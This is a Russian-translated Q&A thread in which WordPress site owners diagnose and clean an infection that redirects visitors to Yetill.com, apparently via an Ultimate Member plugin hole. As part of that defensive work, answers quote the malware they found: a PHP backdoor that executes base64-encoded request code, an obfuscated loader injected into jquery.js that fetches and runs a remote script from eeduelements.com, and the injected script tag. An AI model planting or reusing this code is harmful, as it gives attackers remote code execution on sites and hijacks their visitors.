Кто-нибудь может помочь мне, как исправить мой сайт? Он всегда перенаправляется на Yetill.com. Я искал об этом сайте, и я узнал, что это своего рода вредоносное ПО. Пробовал различные решения, найденные в сети, но так и не решил.
Спасибо.
Сайт Wordpress всегда перенаправляет на Yetill.com
comment
Вы восстанавливаете все из резервных копий и, возможно, делаете разницу между этим и текущим состоянием, чтобы увидеть, что было изменено, если хотите знать. Но можно сделать резервные копии, а затем исправить сайт, чтобы это не повторилось.
- person Sami Kuhmonen schedule 14.08.2018
comment
я должен сравнить каждый файл? или только определенные файлы?
- person iamsushi_j12n schedule 14.08.2018
comment
Вам не обязательно, если вы удалите все, восстановите резервную копию и убедитесь, что все разрешения и обновления в порядке, если это делает кто-то посторонний.
- person Sami Kuhmonen schedule 14.08.2018
comment
установите этот плагин в админку wordpress.org/plugins/wordfence и просканируйте сайт, а если нет, то повторно -загрузите резервную копию, если она у вас есть, а если нет, сначала повторно загрузите wp-admin и wp-include (примечание: убедитесь, что вы загружаете правильную версию), а затем переименуйте имя папки плагина и попытайтесь найти вредоносный код из вашей темы.
- person Aakanksh Patel schedule 14.08.2018
Ответы (8)
Похоже, это вызвано уязвимостью некоторых плагинов, которые вы можете использовать.
В моем случае это была более старая версия (до 2.22) плагина Ultimate Member.
Если вы используете версию 2.22 или более раннюю версию этого плагина, вам следует немедленно обновить этот плагин и очистить временные файлы. (https://wordpress.org/support/topic/malicious-files-in-ultimate-members-plugin/)
После этого выполните поиск недавно обновленных файлов с помощью этой команды. (например, 15 дней)
find ./ -type f -mtime -15
Скорее всего, ваш файл WP jquery и любые файлы с именем «header» могут быть заражены.
/wp-includes/js/jquery/jquery.js
/wp-contents/your-theme/header.php
..
Удалите следующий скрипт из зараженных заголовочных файлов.
<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
Похоже, что это вставляется сразу после открывающего тега заголовка и прямо перед закрывающим тегом заголовка. Убедитесь, что вы удалили оба.
Удалите злонамеренно вставленный скрипт из зараженного файла Jquery или просто замените файл чистым скриптом из других установок WP Core.
Думаю, это должно решить проблему.
person
pinktig
schedule
14.08.2018
Предварительные шаги:
- Резервное копирование всего
- Проверьте файл wp-includes/js/jquery/jquery.js — первая строка должна содержать только комментарий вроде
/*! jQuery v1....Удалить все перед этой строкой (вы сделали резервную копию, верно?) - Проверьте каталог /wp-content/uploads на наличие подозрительных файлов. Для нас это были вредоносные файлы, например. в этом подкаталоге: /ultimatemember/temp/[случайный каталог]/n.php — удалите их после создания резервной копии.
- Установите плагин WordFence WP и просканируйте свой сайт
- Дважды проверьте, что wp-include/js/jquery/jquery.js все еще в порядке (его можно изменить снова)
- Рассмотрите вариант WordFence «Отключить выполнение кода для каталога загрузки», чтобы предотвратить вторжение в будущем, если это работает для вашего сайта (проверьте!).
Задний план:
У нас такая же проблема. Wordfence заметил, что файл wp-includes/js/jquery/jquery.js был изменен на сервере. Восстановление его до исходной версии, похоже, решило эту проблему. НО, файл заразился быстро (часы?). Так что источник нам пока неизвестен...
Мы нашли подозрительный код в /wp-content/uploads/ultimatemember/temp/[random dir]/n.php:
<?php file_put_contents('sdgsdfgsdg','<?php '.base64_decode($_REQUEST['q']));
include('sdgsdfgsdg'); unlink('sdgsdfgsdg'); ?>
Это в основном выполняет любой код PHP извне...
После удаления этих файлов сайт вернулся в нормальное состояние (пару часов).
Мы также заметили подозрительный тег <a> в исходном коде страницы; но не уверен в его актуальности.
<a class="html-attribute-value html-resource-link" target="_blank"
href="https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"
rel="noreferrer noopener">https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4</a>
person
Vivien
schedule
14.08.2018
то же самое. На данный момент ошибка больше не появляется.
- person iamsushi_j12n; 14.08.2018
попробуйте проверить временные файлы внутри «wp-content/uploads/plugin/». В моем файле jquery.js была внедрена вредоносная функция jquery.
- person iamsushi_j12n; 14.08.2018
Нашел что-то подозрительное в /wp-content/uploads/ultimatemember/temp/ — удалил. Каким был твой путь?
- person Markus Junginger; 14.08.2018
попробуйте установить wordfence на свой сайт, он сможет показать внедренные вредоносные коды :)
- person iamsushi_j12n; 14.08.2018
У нас был установлен wordfence. Мой вопрос был скорее в том, был ли у вас также установлен плагин Ultimatemember, или это было просто совпадение.
- person Markus Junginger; 14.08.2018
@ Вивьен, ты обновила плагин Ultimate Member до последней версии? Они (предположительно) исправили уязвимость.
- person Batfan; 17.08.2018
Вам придется выполнить некоторые действия по устранению неполадок. Либо ваша тема, либо один из ваших плагинов содержит вредоносный код.
Следуй этим шагам:
- Переключитесь на тему по умолчанию, например
TwentySeventeen. Если проблема не устранена, это означает, что это не ваша тема. - Деактивируйте все ваши активные плагины и проверьте веб-сайт — проблема должна исчезнуть.
- Начните повторно активировать свои плагины, очищая кеш после каждой повторной активации и проверяя свой веб-сайт. Всякий раз, когда проблема появляется снова, виновником является этот плагин, и вы не можете использовать этот плагин.
Надеюсь это поможет.
person
Hamza Ahmad
schedule
14.08.2018
jquery был заражен в моем случае. Просто удалите код перед /*! jQuery v1.12.4 | (c) Фонд jQuery | jquery.org/license */ и убедитесь, что все ваши плагины обновлены, а сайт безопасен. Также проверьте права доступа к файлам! Это помогает мне в моем случае
person
Rosen
schedule
14.08.2018
Он вернется, проверьте ответ Вивьен.
- person Markus Junginger; 14.08.2018
Да, я обнаружил ту же проблему, о которой вы сказали, в папке Ultimatemember. Но где основная проблема. Откуда инъекция..
- person Rosen; 14.08.2018
Это может быть основной проблемой.
- person Markus Junginger; 14.08.2018
У нас такая же ошибка, эти файлы были заражены. Это вредоносный код, который я нашел в них.
wp-includes/js/jquery/jquery.js
(function() { "use strict"; var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()} })();
темы/вашатема/header.php
<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
person
shadowclover
schedule
14.08.2018
Можете ли вы уточнить свой ответ. Почему они вредоносны? Как это исправить? Постарайтесь сделать свой ответ более удобным для будущих читателей.
- person franiis; 14.08.2018
Код добавляет перенаправление js в заголовок, источник проблемы мы пока не нашли. Мы планируем экспортировать весь наш контент и выполнить полную новую установку WP, чтобы избавиться от любых зараженных файлов.
- person shadowclover; 14.08.2018
Это то, что я обнаружил сегодня после запуска сканера securi. Надеюсь, это поможет кому-то, потому что это противно. Похоже, что в моем случае затрагиваются следующие файлы:
- wp-admin/install.php
- wp-includes/js/jquery/jquery.js
- wp-includes/theme-compat/header-embed.php
- wp-includes/theme-compat/header.php
Что бы это ни было, похоже, оно пошло не так в моем каталоге wp-includes. Я запускаю плагин Ultimate Member и заметил, что кто-то упоминал ранее, что в более ранних версиях этого плагина были уязвимости. Я управляю сетью с несколькими сайтами и также заметил, что две регистрационные формы на моих дочерних сайтах имеют роль администратора по умолчанию (какой поставщик плагинов сочтет это безопасным в качестве параметра регистрации по умолчанию?) с включенной опцией автоматического утверждения ( писем с подтверждением нет). По-видимому, активация этого плагина в сетевой среде требует дополнительной тщательной проверки этих форм регистрации и входа.
person
Steem Backed
schedule
14.08.2018
(Если у вас есть дополнительный вопрос, пожалуйста, задайте его как отдельный вопрос; это может быть лучше на сайтах WordPress или веб-мастеров, так как это не вопрос программирования).
- person halfer; 15.08.2018
Была такая же проблема. jquery был заражен, и его пришлось заменить оригинальной версией. Хакер, вероятно, использовал бэкдор Ultimatemember, чтобы загрузить php-файл и запустить его. Мне пришлось очистить временный каталог плагина.
Другое наблюдение заключалось в том, что взлом заставлял модифицированный jquery загружать скрипт, адрес которого загружался с http://src.eeduelements.com/get.php . Это дает им возможность чередовать объявления.
person
Daniela Jordanova
schedule
15.08.2018
sudo grep --include=\*.php -rnw . -e "<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>"
что наряду с этим ответом ниже помогло мне очистить мои файлы. Это затронуло все мои веб-сайты, но теперь, похоже, все еще сохраняется на сайте, на котором был конечный участник. Все еще работаю над этим. Однако этот Php-скрипт был просто невероятным. спасибо автору конечно.
Это php из приведенного выше ответа. Я просто заменил часть поиска вредоносными программами, перенаправляющими на Yetill.
<?php
//Enter it as it is and escape any single quotes
$find='<script type=\'text/javascript\' src=\'https://cdn.eeduelements.com/jquery.js?ver=1.0.8\'></script>';
echo findString('./',$find);
function findString($path,$find){
$return='';
ob_start();
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
if(is_dir($path.'/'.$file)){
$sub=findString($path.'/'.$file,$find);
if(isset($sub)){
echo $sub.PHP_EOL;
}
}else{
$ext=substr(strtolower($file),-3);
if($ext=='php'){
$filesource=file_get_contents($path.'/'.$file);
$pos = strpos($filesource, $find);
if ($pos === false) {
continue;
} else {
//The cleaning bit
echo "The string '".htmlentities($find)."' was found in the file '$path/$file and exists at position $pos and has been removed from the source file.<br />";
$clean_source = str_replace($find,'',$filesource);
file_put_contents($path.'/'.$file,$clean_source);
}
}else{
continue;
}
}
}
}
closedir($handle);
}
$return = ob_get_contents();
ob_end_clean();
return $return;
}
?>
person
Maxwell Paradis
schedule
15.08.2018
